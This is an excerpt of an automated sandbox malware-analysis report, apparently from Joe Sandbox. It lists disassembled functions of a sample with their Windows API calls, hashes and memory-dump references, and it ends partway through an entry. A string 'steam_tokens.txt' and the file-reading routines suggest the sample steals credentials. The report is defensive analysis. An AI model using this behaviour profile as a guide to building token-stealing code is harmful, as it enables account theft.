                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: steam_tokens.txt
                              • API String ID: 367037083-401951677
                              • Opcode ID: 0e64b9619bb9a51c7191c9afc6e08949f614d211c4b741ed0b1f8bdeb3f3c21f
                              • Instruction ID: 29374b7cd95478214a887eba4746d93ccb15ffc1e09a6670bdcb36672018da89
                              • Opcode Fuzzy Hash: 0e64b9619bb9a51c7191c9afc6e08949f614d211c4b741ed0b1f8bdeb3f3c21f
                              • Instruction Fuzzy Hash: 8F316731A102445BC722BB78E84AA6E7BE8AF40304F056528FA86FB312DA24DC0687D1
                              Function 00E39A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00E3140E), ref: 00E39A9A
                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00E3140E), ref: 00E39AB0
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,00E3140E), ref: 00E39AC7
                              • ReadFile.KERNEL32(00000000,00000000,?,00E3140E,00000000,?,?,?,00E3140E), ref: 00E39AE0
                              • LocalFree.KERNEL32(?,?,?,?,00E3140E), ref: 00E39B00
                              • CloseHandle.KERNEL32(00000000,?,?,?,00E3140E), ref: 00E39B07
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 7dc950736d66ee872b7512723612da0a0fc4aeb70e2d4b240efb2ad984cd2c36
                              • Instruction ID: 47eccbe2f33d8a54f75d467076e6ed2c3d3f62be2a1fbfb52a3400925f5f6001
                              • Opcode Fuzzy Hash: 7dc950736d66ee872b7512723612da0a0fc4aeb70e2d4b240efb2ad984cd2c36
                              • Instruction Fuzzy Hash: 7E112171600209AFE720DF69DC88AABB76CEB04748F105259F911A6281D7759D50CBA4
                              Function 00E55AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55B14
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00E55B7C
                              • memmove.MSVCRT(00000000,?,?), ref: 00E55B89
                              • memmove.MSVCRT(00000000,?,?), ref: 00E55B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long
                              • API String ID: 2052693487-3788999226
                              • Opcode ID: 0bd0badcc13e1cedd5fdf2d3efb982fa4007bfb27a51e45ebcebd4d9b34e4a52
                              • Instruction ID: 06c9a25b63d42a8586fca681a99faf15fc40d0601dd166c09721ff51cb37f570
                              • Opcode Fuzzy Hash: 0bd0badcc13e1cedd5fdf2d3efb982fa4007bfb27a51e45ebcebd4d9b34e4a52
                              • Instruction Fuzzy Hash: 5B417372B006199FCF08DF6CC995AAEBBF5EB88311F158629E915E7384E630DD04CB90
                              Function 00E590DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 23cf2abcf371d0071783cd0d6f6a9183f21c7c35f848ec96eb468076ee81956a
                              • Instruction ID: ac3333cf0b167a64bda45d2e986a3629b78199076604c1af4a06b616ad79b798
                              • Opcode Fuzzy Hash: 23cf2abcf371d0071783cd0d6f6a9183f21c7c35f848ec96eb468076ee81956a
                              • Instruction Fuzzy Hash: 3C41187450475CDEDB318B249D85FFB7BFC9B45309F1458E8ED86A6183E2719A488F20
                              Function 00E47D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47D58
                                • Part of subcall function 00E5A1C0: std::exception::exception.LIBCMT ref: 00E5A1D5
                                • Part of subcall function 00E5A1C0: std::exception::exception.LIBCMT ref: 00E5A1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47D76
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$std::exception::exception
                              • String ID: invalid string position$string too long
                              • API String ID: 3310641104-4289949731
                              • Opcode ID: 9368af17c80fa12193432c165bc438a013914e83132cbb78206fb0267811a7c6
                              • Instruction ID: 5b8def6a697a9717b2c02d1ad171eb81fb07b9a94016fb11b81e4ce105c5704a
                              • Opcode Fuzzy Hash: 9368af17c80fa12193432c165bc438a013914e83132cbb78206fb0267811a7c6
                              • Instruction Fuzzy Hash: F621E4727187004BD720DE6CF880A3AB7E5EFA2754F245A6EE482AB281D770DC0487E1
                              Function 00E533C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E533EF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E533F6
                              • GlobalMemoryStatusEx.KERNEL32 ref: 00E53411
                              • wsprintfA.USER32 ref: 00E53437
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB
                              • API String ID: 2922868504-2651807785
                              • Opcode ID: fd9af2458afc4ecfe0172952c000fbf3467ce5fd8f7a22128314c26a0a0ca645
                              • Instruction ID: 47a66abc6227b5bfaef463c196da75d3131d1ba3612817173de5f1d3a0be864a
                              • Opcode Fuzzy Hash: fd9af2458afc4ecfe0172952c000fbf3467ce5fd8f7a22128314c26a0a0ca645
                              • Instruction Fuzzy Hash: 74012871A04214AFDB24DFA8DD49BAEB7B8FB44715F000629FE06E7380D779590087A1
                              Function 00E52400 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlenmemset
                              • String ID:
                              • API String ID: 3212139465-0
                              • Opcode ID: ed9557cbcc063b88b89428a0309fb7b26a5f3293d44370e0ebde0d2baba51d54
                              • Instruction ID: 1d9422370148cc6d3e7fe0fb72284a1157c7ebba0cb6cebc15a4a406d38e95f9
                              • Opcode Fuzzy Hash: ed9557cbcc063b88b89428a0309fb7b26a5f3293d44370e0ebde0d2baba51d54
                              • Instruction Fuzzy Hash: A98122B1E003059BDB14CF94D844BAEB7B5EF8530AF24986DEA08B7381E7759D49CB90
                              Function 00E47EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E47F31
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E47F60
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E47FA5
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E47FD3
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E48007
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 46073b004590d022dc0c3d54c5037c3b273d3057e6b1b3b3bd1f3f0c81ff4025
                              • Instruction ID: ca74cb793452b0fa0864d14db632f56bb172c4cf9215de7825eb9880fcef9bbb
                              • Opcode Fuzzy Hash: 46073b004590d022dc0c3d54c5037c3b273d3057e6b1b3b3bd1f3f0c81ff4025
                              • Instruction Fuzzy Hash: 3541D03060821ADFDB20DF68E480EAEB7B4FF54304F115189E845EB351DB71AA6ACBD1
                              Function 00E48050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E480BB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E480EA
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E48102
                              • lstrlen.KERNEL32(00000000), ref: 00E48140
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4816F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: fcab34c5bcfb747ece605dd144d708a8987923d6aef8ba46e91a3291480db3be
                              • Instruction ID: 64c18d6dc5235a8b9bef9333990a5f034a50d873f150436a53e71efeef19b5bc
                              • Opcode Fuzzy Hash: fcab34c5bcfb747ece605dd144d708a8987923d6aef8ba46e91a3291480db3be
                              • Instruction Fuzzy Hash: 49418E71600206DFDB21DF68EA48BAEBBF4EF44304F10945EE98AE7244EB34D945CB90
                              Function 00E51B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00E51B72
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E5184F
                                • Part of subcall function 00E51820: lstrlen.KERNEL32(00D16EC8), ref: 00E51860
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E51887
                                • Part of subcall function 00E51820: lstrcat.KERNEL32(00000000,00000000), ref: 00E51892
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E518C1
                                • Part of subcall function 00E51820: lstrlen.KERNEL32(00E64FA0), ref: 00E518D3
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E518F4
                                • Part of subcall function 00E51820: lstrcat.KERNEL32(00000000,00E64FA0), ref: 00E51900
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E5192F
                              • sscanf.NTDLL ref: 00E51B9A
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E51BB6
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E51BC6
                              • ExitProcess.KERNEL32 ref: 00E51BE3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                              • String ID:
                              • API String ID: 3040284667-0
                              • Opcode ID: 16a6be6b4306c747f1b1d8b86c21e4e8aff724b2b17c4125459aff901373f41f
